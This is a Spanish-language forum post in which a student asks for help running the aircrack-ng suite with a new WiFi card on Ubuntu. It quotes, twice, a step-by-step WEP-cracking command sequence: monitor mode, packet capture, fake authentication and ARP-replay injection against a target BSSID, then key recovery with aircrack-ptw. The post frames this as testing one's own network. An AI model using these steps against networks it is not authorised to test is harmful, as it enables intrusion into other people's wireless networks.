Bueno, este es mi primer post en el foro, después de varios días leyendo y leyendo XD
Siento que el primer post sea para preguntar dudas y no para aportar algo. La verdad es que estoy muy interesado en temas de seguridad informática (sobretodo después de cursar la asignatura homónima en la carrera de Ingeniería Informática hace un par de meses xD).
Bueno, mi problema es el siguiente:
Veréis, hace ya algún tiempo había hecho un pequeño (pequeñísimo la verdad) tutorial para comprobar la seguridad de la clave WEP de una red inalámbrica. Lo hice en colaboración con un amigo que tenía de okupa en mi casa. Este tutorial funcionaba perfectamente bajo ubuntu 7.10 (y versiones posteriores) en mi anterior portátil, que tenía la tarjeta WiFi Intel PRO Set Wireless 3945 (o algo similar, no lo recuerdo muy bien).
Actualmente he cambiado de ordenador y el actual usa la tarjeta que dá nombre a este hilo. Ahora me encuentro que para hacer funcionar el aircrack quizá necesite hacer algún "malabarismo" para que funcione con esta tarjeta en mi Ubuntu 9.10 (podría actualizar a la 10.04 en caso de que fuera necesario). Algo he leído acerca de buscar cual es el chipset que se corresponde a esta tarjeta inalámbrica, pero tras una hora por Google me he dado por vencido.
Me sería de gran ayuda si alguno de vosotros fuese tan amable de decirme los pasos a seguir para instalar (y hacer funcionar) la suite aircrack en mi ordenador (en Ubuntu 9.10 se entiende) o al menos para saber cual es el chipset de mi tarjeta.
Si no es mucho pedir, me gustaría también ser capaz de hacer funcionar el aircrack en una imagen de debian-lenny emulada en un qemu.
Os pongo los pasos que soía seguir para usar aircrack en mi ordenador anterior:
Citar
airmon-ng start wlan0
Miras cual es la interfaz que esta habilitada en modo monitor (normalmente sera mon0)
new shell
airodump-ng <interfaz>
miras las redes
Ctrl+C
aireplay-ng -1 0 -a BSSID -e ESSID -h Mi MAC <interfaz>
aireplay-ng -3 -b BSSID -h Mi MAC <interfaz>
new shell
airodump-ng -c canal -w nombre del fichero con las captura <interfaz>
new shell
aircrack-ptw fichero con las capturas.cap
Miras cual es la interfaz que esta habilitada en modo monitor (normalmente sera mon0)
new shell
airodump-ng <interfaz>
miras las redes
Ctrl+C
aireplay-ng -1 0 -a BSSID -e ESSID -h Mi MAC <interfaz>
aireplay-ng -3 -b BSSID -h Mi MAC <interfaz>
new shell
airodump-ng -c canal -w nombre del fichero con las captura <interfaz>
new shell
aircrack-ptw fichero con las capturas.cap
PD: Si pudiérais indicarme algún tutorial o información acerca de kismet, SWScanner o algún programa similar os lo agradecería.